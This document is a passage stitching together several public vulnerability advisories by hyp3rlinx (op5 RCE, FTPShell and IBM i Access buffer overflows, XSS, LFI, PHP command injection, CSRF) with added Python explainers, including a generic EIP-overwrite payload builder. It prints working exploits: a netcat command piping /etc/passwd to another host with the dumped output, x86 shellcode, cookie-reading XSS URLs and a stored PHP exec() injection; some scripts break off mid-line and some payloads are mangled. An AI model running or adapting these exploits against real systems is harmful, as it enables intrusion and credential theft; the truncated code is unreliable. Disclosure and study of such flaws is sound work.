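def titles(conn: sqlite3.Connection, query: str) -> list:
    """Run a query and return the title column in result order."""
    return [row[1] for row in conn.execute(query)]


def injected_expression_is_evaluated(conn: sqlite3.Connection) -> bool:
    """Show the defect: a client-chosen subquery runs as part of the sort key."""
    payload = "title, (SELECT count(*) FROM sqlite_master)"
    return titles(conn, build_query_vulnerable(payload)) == ["first idea", "most voted", "third idea"]


def safe_builder_rejects(value: str) -> bool:
    """True when the allowlisting builder refuses the value outright."""
    try:
        build_query_safe(value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("injected subquery evaluated by vulnerable builder:", injected_expression_is_evaluated(db))
    print("safe builder rejects injection:", safe_builder_rejects("title, (SELECT 1)"))
    print("safe query by votes desc:", titles(db, build_query_safe("votes", "desc")))
```

Failing closed with an exception, rather than silently falling back to a default column, is deliberate: a request carrying an `orderby` value outside the allowlist is a probe worth logging, and a fallback would hide it.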
op5 v7.1.9 Remote Command Execution
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt

Vendor:
=======
www.op5.com

Product:
========
op5 v7.1.9

op5 Monitor is a software product for server and network monitoring and management based on the open source project Nagios.

Vulnerability Type:
===================
Remote Command Execution

CVE Reference:
==============
N/A

Vulnerability Details:
======================
op5 has a CSRF entry point that can be used to execute arbitrary remote commands on the op5 system, sent via HTTP GET requests, allowing attackers to completely take over the affected host. To be victimized, a user must be authenticated and visit a malicious webpage or click an infected link...

Reference:
https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/

Exploit code(s):
================
Trivial RCE: cat /etc/passwd... using netcat

nc.exe -vvlp > passwds.txt

https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%20

result:

listening on [any] ...
192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT
sent 0, rcvd 1343

C:\netcat-win32-1.12>type passwds.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smstools:x:499:499::/var/lib/smstools:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
op5lsu:x:500:500::/home/op5lsu:/bin/bash
saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
monitor:x:299:48::/opt/monitor:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin

Disclosure Timeline:
====================
Vendor Notification: March 27, 2016
Vendor confirms vulnerability: March 27, 2016
Vendor issues patched new release v7.2.0: April 5, 2016
April 6, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Description:
============
Request Method(s):      [+] GET
Vulnerable Product:     [+] op5 v7.1.9
Vulnerable Parameter(s): [+] 'cmd_str'

hyp3rlinx
FTPShell Client v5.24 Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt

Vendor:
=======
www.ftpshell.com

Product:
========
FTPShell Client version 5.24

FTPShell client is a Windows file transfer program that enables users to reliably transfer files, upload to websites, and download updates from the internet.

Vulnerability Type:
===================
Buffer Overflow

CVE Reference:
==============
N/A

Vulnerability Details:
======================
The ftpshell.exe client has a buffer overflow entry point in the 'Address' input field used to connect to an FTP server, allowing local arbitrary code execution by overwriting several registers on the stack and controlling program execution flow. The EIP register will be used to jump to our malicious shellcode, which will be patiently waiting in the ECX register.

Exploited registers dump...

EAX 0021
ECX 0012E5B0
EDX 76F670B4 ntdll.KiFastSystemCallRet
EBX 76244FC4 kernel32.76244FC4
ESP 0012E658 ASCII "calc.exe"   <- BAM!
EBP 7621E5FD kernel32.WinExec
ESI 001D2930
EDI 76244FEC kernel32.76244FEC
EIP 015FB945
C 0  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 0  SS 0023 32bit 0()
Z 1  DS 0023 32bit 0()
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS NULL
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST C5E1  Cond 1 1 0 1  Err 1 1 1 0 0 0 0 1  (Unordered)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0

Test stack dump:

(3b8.fa0): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for ftpshell.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ftpshell.exe -
eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8 edi=017a9498
eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=             efl=00210202
41414141 ??              ???

Exploit code(s):
================
import struct

#FTPShell Client version 5.24 - www.ftpshell.com
#Buffer Overflow Exploit
#by hyp3rlinx
#run to generate payload, then copy and inject
#into the 'Address' field on the client and BOOM!

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

#payload="A"*2475+"R"*4+"\xcc"*100   #< control EIP register

#find appropriate assembly instruction to call our payload JMP or CALL ECX.
#!mona jmp -r ecx -m kernel32.dll
eip=struct.pack('
AccessDiver V4.301 Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt

Vendor: M. Jean Fages, www.accessdiver.com, circa 1998-2006

Product: AccessDiver V4.301 build 5888

AccessDiver is a security tester for web pages. It has a set of tools that verify the robustness of your accounts and directories, so you know whether your customers, your users and you can use your web site safely.

Vulnerability Type: Buffer Overflow

CVE Reference: N/A

Vulnerability Details:

AccessDiver is vulnerable to multiple buffer overflows; two vectors are described below.

1) Buffer overflow at 2073 bytes in the URL field for Server / IP address. The overflow overwrites the NSEH (pointer to next SEH record) and the SEH handler, so the handler address is attacker-controlled once an exception is raised.

EAX
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX
ESP 0012EA08
EBP 0012EA28
ESI
EDI
EIP 52525252 <- BOOM
C 0 ES 0023 32bit 0()
P 1 CS 001B 32bit 0()
A 0 SS 0023 32bit 0()
Z 1 DS 0023 32bit 0()
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS NULL
D 0
O 0 LastErr ERROR_SUCCESS ()
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0-ST7 empty
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 1272 Prec NEAR,53 Mask 1 1 0 0 1 0

2) Buffer overflow when loading a malicious "Exploit zone file" text file containing 2080 bytes: from the "Weak History" menu choose Import "from File", choose the exploit text file and BOOM!

EAX
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX
ESP 0018E940
EBP 0018E960
ESI
EDI
EIP 52525242 <- KABOOM
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 1 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_SUCCESS ()
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0-ST7 empty g
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0

Windbg dump:

(2abc.2330): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx= ecx=52525252 edx=7702b4ad esi= edi=
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
52525252 ?? ???

Disclosure Timeline:
Vendor Notification: NA
December 26, 2015 : Public Disclosure

Exploitation Technique: Local

Severity Level: Med

by hyp3rlinx
phpback v1.1 XSS vulnerability
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPBACK-XSS.txt

Vendor: www.phpback.org

Product: phpback v1.1

PHPBack is an open source feedback web application that you can easily implement on your website. It gives your customers a way to communicate their ideas to improve your products.

Vulnerability Type: Cross site scripting - XSS

CVE Reference: N/A

Vulnerability Details:

An XSS vulnerability exists in the search field's 'query' parameter, allowing arbitrary client-side JavaScript execution against victims who click an infected link or visit an attacker-controlled web page. Session ID theft may follow, as well as the possibility of bypassing CSRF protections etc. The parameter is submitted by POST, so the attacker's page carries an auto-submitting form rather than a plain link.

XSS Exploit code(s):

http://localhost/phpback_v1.1/phpback-1.1c/home/search; method="POST">
document.getElementById('InFeCT0r').submit()

Disclosure Timeline:
Vendor Notification: December 11, 2015
December 15, 2015 : Public Disclosure

Exploitation Technique: Remote

Severity Level: High

Description:
Request Method(s): [+] POST
Vulnerable Product: [+] phpback v1.1
Vulnerable Parameter(s): [+] query

by hyp3rlinx
Zenphoto 1.4.10 Local File Inclusion
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt

Vendor: www.zenphoto.org

Product: Zenphoto 1.4.10

Vulnerability Type: Local File Inclusion

CVE Reference: N/A

Vulnerability Details:

Zenphoto's pluginDoc.php file is vulnerable to local file inclusion: the 'extension' parameter is used to build a file path, and injecting "../" directory traversal sequences lets an attacker read arbitrary server files outside the web directory (or include a file of their choosing), which can lead to sensitive information disclosure, code execution or DoS on the victim's web server.

Local File Inclusion Code(s):

http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../xampp/phpinfo

Disclosure Timeline:
Vendor Notification: November 10, 2015
December 1, 2015 : Public Disclosure

Exploitation Technique: Local

Severity Level: High

Description:
Request Method(s): [+] GET
Vulnerable Product: [+] Zenphoto 1.4.10
Vulnerable Parameter(s): [+] extension

by hyp3rlinx
Zenphoto 1.4.10 XSS Vulnerability
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-XSS.txt

Vendor: www.zenphoto.org

Product: Zenphoto 1.4.10

Vulnerability Type: Cross site scripting - XSS

CVE Reference: N/A

Vulnerability Details:

Multiple XSS entry points exist, allowing arbitrary client-side JavaScript execution against victims who click an infected link. Session ID and data theft may follow, as well as the possibility of bypassing CSRF protections, injecting iframes to establish communication channels etc. Each payload below closes the attribute the parameter is reflected into and adds an onMouseMove event handler.

XSS Exploit code(s):

1) http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin-plugins.php?tab=%22%22%20onMouseMove=%22alert%28%27XSS%20hyp3rlinx%20Nov%205,%202015\n%27%2bdocument.cookie%29%22%20=666

2) http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin-options.php?page=options=plugin=%22%20onMouseMove=%22alert%28%27XSS%20hyp3rlinx\n%27%2bdocument.cookie%29%22

3) http://localhost/zenphoto-zenphoto-1.4.10/zp-core/admin.php?msg=hyp3rlinx=external=%22+onMouseMove%3D%22alert%28%27hyp3rlinx%20\n\n%20%27%2bdocument.cookie%29%3B

Disclosure Timeline:
Vendor Notification: November 10, 2015
December 1, 2015 : Public Disclosure

Exploitation Technique: Remote

Severity Level: High

Description:
Request Method(s): [+] GET
Vulnerable Product: [+] Zenphoto 1.4.10
Vulnerable Parameter(s): [+] tab, single, error

by hyp3rlinx
IBM i Access Buffer Overflow Code DOS CVE-2015-7422
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI-ACCESS-BUFFER-OVERFLOW-DOS.txt

Vendor: www.ibm.com

Product: IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected.

Vulnerability Type: Stack Buffer Overflow DoS

CVE Reference: CVE-2015-7422

Vulnerability Details:

IBM i Access for Windows is vulnerable to a buffer overflow caused by improper bounds checking. A local attacker could overflow a buffer and cause the program to crash.

Remediation/Fixes:

The buffer overflow can be remediated by obtaining and applying Service Pack SI57907. The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html

Workarounds and Mitigations: None known

CVSS Base Score: 4
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/107770 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

Disclosure Timeline:
Vendor Notification: May 21, 2015
November 18, 2015 : Public Disclosure

Exploitation Technique: Local

Severity Level: Med

Description:
Request Method(s): [+] local
Vulnerable Product: [+] IBM i Access for Windows Release 7.1
Affected Area(s): [+] IBM i Access

by hyp3rlinx
IBM i Access Buffer Overflow Code Exec CVE-2015-2023
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt

Vendor: www.ibm.com

Product: IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected.

Vulnerability Type: Stack Buffer Overflow, Arbitrary Code Execution

CVE Reference: CVE-2015-2023

Vulnerability Details:

IBM i Access for Windows is vulnerable to a buffer overflow. A local attacker could overflow a buffer and execute arbitrary code on the Windows PC. Client Access also has the ability to receive remote commands via the "Cwbrxd.exe" service (Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253): "Incoming remote command was designed for running non-interactive commands and programs on a PC". Through that service a remote attacker could therefore execute arbitrary code on the system.

Remediation/Fixes:

The buffer overflow can be remediated by obtaining and applying Service Pack SI57907. The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html

Workarounds and Mitigations: None known

CVSS Base Score: 4.4
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)

Exploit code(s):

Three Python PoC scripts follow that exploit various components of IBM i Access.

1) Exploits "ftdwprt.exe", direct EIP overwrite

import struct,os,subprocess

pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe "

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

# use jmp or call esp in FTDBDT.dll under AFPViewer for Client Access
# we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00 (C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)
rp=struct.pack('
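The FTPShell and ftdwprt.exe cases above are both direct EIP overwrites: find the offset at which the saved return address is overwritten, then place the address of a JMP/CALL <reg> gadget there. The following is an added example that is not part of the advisories, showing the two steps as reusable Python. The offset 2475 is the one the FTPShell script reports; the gadget address 0x41424344, the INT3 bytes standing in for shellcode and the function names are placeholders chosen here.

```python
import string
import struct

# Added example (not the advisory's script): the two steps behind a direct EIP
# overwrite like the FTPShell 'Address' field or ftdwprt.exe cases.
# The gadget address and the shellcode below are placeholders.


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique
    within the pattern, so the value that lands in EIP identifies the offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the pattern space")


def pattern_offset(pattern, eip_value):
    """eip_value is the DWORD the debugger shows (e.g. 0x41414141). The CPU loaded it
    little-endian from the stack, so search for its little-endian byte form."""
    idx = pattern.find(struct.pack("<I", eip_value))
    if idx < 0:
        raise ValueError("EIP value not found in pattern")
    return idx


def has_bad_chars(data, bad=(b"\x00", b"\x0a", b"\x0d")):
    """Bytes a string-based input field (an address box, a CLI argument) truncates or mangles."""
    return [b for b in bad if b in data]


def build_payload(offset, ret_addr, shellcode, shellcode_first=False, nop_sled=16):
    """Lay out the overflow string.

    offset          filler bytes before the saved return address (2475 for FTPShell)
    ret_addr        address of a JMP/CALL <reg> gadget in a module without ASLR
    shellcode_first True when the gadget is JMP/CALL ECX and ECX points at the start
                    of our buffer; False for the JMP ESP layout (ftdwprt.exe), where
                    the shellcode follows the overwritten return address
    """
    ret = struct.pack("<I", ret_addr)
    bad = has_bad_chars(ret)
    if bad:
        raise ValueError("return address contains bad chars: %r" % bad)
    if shellcode_first:
        if len(shellcode) > offset:
            raise ValueError("shellcode does not fit before the return address")
        return shellcode + b"A" * (offset - len(shellcode)) + ret
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    # Step 1: crash the target with a pattern and read EIP from the debugger.
    pattern = cyclic_pattern(3000)
    crashed_eip = int.from_bytes(pattern[2475:2479], "little")  # stands in for the debugger value
    print("EIP offset:", pattern_offset(pattern, crashed_eip))
    # Step 2: build the real string; 0x41424344 is a placeholder gadget address.
    print("payload length:", len(build_payload(2475, 0x41424344, b"\xcc" * 8)))
```

The bad-character check matters for both layouts: an address whose little-endian form contains 0x00 would end the string copy, which is the same constraint the TCPing advisory below runs into with its 0x0040xxxx addresses.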
CF Image Host XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-XSS.txt

Vendor: codefuture.co.uk/projects/imagehost

Product: CF Image Host 1.65 - 1.6.6
Archive download listed as version 1.65, unzips as imagehost 1.6.6.

Vulnerability Type: Cross site scripting - XSS

CVE Reference: N/A

Vulnerability Details:

Multiple reflected XSS entry points exist, allowing arbitrary client-side browser code execution against victims who click an infected link. This undermines the trust between client and server and can lead to information theft, dropping malware, stealing session cookies etc. Each payload breaks out of the attribute the parameter is reflected into and adds an onMouseMove handler.

XSS Exploit code(s):

1) http://localhost/imagehost1.6.6/admin.php?act=images=%22%20onMouseMove=%22alert%280%29

2) http://localhost/imagehost1.6.6/admin.php?act=edit=%22%20onMouseMove=%22alert%280%29

3) http://localhost/imagehost1.6.6/admin.php?act=images=%22%20onMouseMove=%22alert%280%29

Disclosure Timeline:
Vendor Notification: NA
November 14, 2015 : Public Disclosure

Exploitation Technique: Remote

Severity Level: Medium

Description:
Request Method(s): [+] GET
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s): [+] orderBy, id, ip

by hyp3rlinx
CF Image Host PHP Command Injection
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt

Vendor: codefuture.co.uk/projects/imagehost

Product: CF Image Host 1.65 - 1.6.6
Archive download listed as version 1.65, unzips as imagehost 1.6.6.

Vulnerability Type: PHP Command Injection

CVE Reference: N/A

Vulnerability Details:

CF Image Host lets users who have access to the management area write directly to the 'set.php' page under the /inc directory, which stores setting values such as 'Site Title' and 'Site Slogan'. Because the values are written into PHP source rather than into a data file, an attacker with that access can inject specially crafted PHP payloads and execute arbitrary operating system commands on the victim host. This can lead to privilege escalation, RFI, backdoors etc., and most likely to full compromise of the affected system or of the shared environment if applicable.

PHP Command Injection Exploit code(s):

Under the Settings tab we can inject the PHP code below; it remains persistent because it is written to disk in 'set.php'. Afterwards, whenever the victim visits the application and clicks a tab, the stored OS command is executed.

1) Navigate to the CF Image Host settings tab: http://localhost/imagehost1.6.6/admin.php?act=set

2) Click the admin menu on the left and enter your passwords. DO NOT click 'Save changes' yet, or you get an error message asking you to enter credentials.

3) Go back to the settings tab, click 'General', then inject the PHP code below into the 'Site Title' input field.

4) Click 'Save Changes'. The code is stored under the /inc directory within the 'set.php' PHP file.

The injection payload needs the single quotes, double backslashes and semicolons as shown below to close the existing string literal and keep the PHP file syntactically valid, so that the page does not break with errors; the extra backslashes, quotes and semicolons are removed when the value is written.

Some examples:

';echo exec("c:\\Windows\\system32\\calc.exe");'';';

'set.php' on line 11 then becomes:

$settings['SET_TITLE'] = '';echo exec("c:\Windows\system32\calc.exe");'';';';

Or inject a command to launch chrome.exe etc.:

';echo exec("c:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe");'';';

Afterwards, click some of the tabs above such as 'Database' or 'Ban User' and the stored PHP command executes, running calc.exe or launching Google Chrome.

Disclosure Timeline:
Vendor Notification: NA
November 13, 2015 : Public Disclosure

Exploitation Technique: Local / Remote

Severity Level: High

Description:
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s): [+] 'Site Title', 'Site Slogan' etc.
Affected Area(s): [+] OS

by hyp3rlinx
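The root cause above is that a setting value is pasted into PHP source between two single quotes, so a value containing `';` ends the string and starts a new statement. The following is an added example, not CF Image Host's code, that reproduces the set.php line shape from the advisory, shows the statement count a quote-breaking payload produces, and shows the escaping that keeps the value a string. The payload is a shortened form of the one above; the function names and the toy statement scanner are this example's own.

```python
# Added example (not CF Image Host's code): why writing a setting straight into a PHP
# source file is code injection, and the escaping that closes the hole. The line layout
# mimics the set.php line quoted in the advisory; the payload is a shortened form of it.

SAMPLE_PAYLOAD = "';echo exec(\"calc.exe\");'"


def php_single_quoted(value):
    """Encode value as a PHP single-quoted literal: only backslash and quote are special."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_setting_naive(key, value):
    """What a write of the form "$settings['KEY'] = '$value';" produces: the value's
    own quotes and semicolons become part of the program."""
    return "$settings['%s'] = '%s';" % (key, value)


def render_setting_safe(key, value):
    """Same line, but the value is encoded as a literal and the key is constrained."""
    if not key.isidentifier():
        raise ValueError("setting name must be an identifier")
    return "$settings['%s'] = %s;" % (key, php_single_quoted(value))


def count_statements(line):
    """Count ';' outside single-quoted strings. A toy scanner: it handles backslash
    escapes inside quotes and nothing else (no double-quoted strings, no comments),
    which is enough to compare the two renderings above."""
    in_quote = False
    escaped = False
    count = 0
    for ch in line:
        if in_quote:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == "'":
                in_quote = False
        elif ch == "'":
            in_quote = True
        elif ch == ";":
            count += 1
    return count


if __name__ == "__main__":
    naive = render_setting_naive("SET_TITLE", SAMPLE_PAYLOAD)
    safe = render_setting_safe("SET_TITLE", SAMPLE_PAYLOAD)
    print(naive, "->", count_statements(naive), "statements")  # the exec() runs on include
    print(safe, "->", count_statements(safe), "statement")     # still one assignment
```

Escaping makes the line well-formed, but the better fix is not to store settings as executable PHP at all: write them to a JSON or INI file outside the web root and read them back as data, so a value can never become code.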
CF Image Host CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt

Vendor: codefuture.co.uk/projects/imagehost

Product: CF Image Host 1.65 - 1.6.6
Archive download listed as version 1.65, unzips as imagehost 1.6.6.

Vulnerability Type: Cross site request forgery - CSRF

CVE Reference: N/A

Vulnerability Details:

No CSRF protection exists, allowing attackers to make requests to the server on behalf of a victim who is logged in and visits a malicious site or clicks an infected link. This lets attackers modify certain web application settings to whatever they wish.

CSRF Exploit code(s):

http://localhost/imagehost1.6.6/admin.php?act=set;>
http://hyp3rlinx.altervista.org; />
document.getElementById('HELL').submit()

Disclosure Timeline:
Vendor Notification: NA
November 14, 2015 : Public Disclosure

Exploitation Technique: Remote

Severity Level: High

Description:
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6

by hyp3rlinx
Microsoft .NET Framework XSS / Elevation of Privilege CVE-2015-6099
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MICROSOFT-XSS-ELEVATION-OF-PRIVILEGE.txt

Vendor: www.microsoft.com

Product: Microsoft .NET Framework

Vulnerability Type: XSS / Elevation of Privilege

CVE Reference: CVE-2015-6099

Vulnerability Details:

Microsoft .NET Framework is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

.NET Elevation of Privilege Vulnerability - CVE-2015-6099

An elevation of privilege vulnerability exists when ASP.NET improperly validates values in HTTP requests, exposing users to a potential cross-site scripting (XSS) attack. An attacker who successfully exploited the vulnerability could leverage a vulnerable website to inject client-side script into a user's browser and ultimately modify or spoof content, conduct phishing activities, disclose information, or perform any action on the vulnerable website that the target user has permission to perform.

To exploit this vulnerability, user interaction is required. In a web-browsing scenario a user would have to navigate to a compromised website. In an email attack scenario an attacker would have to convince a user who is logged on to a vulnerable server to click a specially crafted link in an email.

The update addresses the vulnerability by modifying how ASP.NET validates the value of an HTTP request. Microsoft received information about the vulnerability through coordinated vulnerability disclosure. At the time this security bulletin was originally issued, Microsoft was unaware of any attack attempting to exploit this vulnerability.

Microsoft has not identified any mitigating factors for this vulnerability. Microsoft has not identified any workarounds for this vulnerability. The following workarounds may be helpful in your situation:

Remove the requestPathInvalidCharacters key from web.config. To work around this issue, administrators can remove the non-default setting from web.config, or at least include the ':' character in the requestPathInvalidCharacters setting.

How to undo the workaround: restore the previously removed line.

https://technet.microsoft.com/library/security/MS15-118
http://www.symantec.com/security_response/vulnerability.jsp?bid=77479_rssid=sr-advisories
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6099

Disclosure Timeline:
Vendor Notification: August 15, 2015
November 10, 2015 : Public Disclosure

Exploitation Technique: Remote

Severity Level: High

Description:
Request Method(s): [+] GET / POST

Vulnerable Product versions:
Microsoft .NET Framework 4.0
Microsoft .NET Framework 4.5
Microsoft .NET Framework 4.5.1
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 4.6
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8 for x64-based Systems
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT
Microsoft Windows RT 8.1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
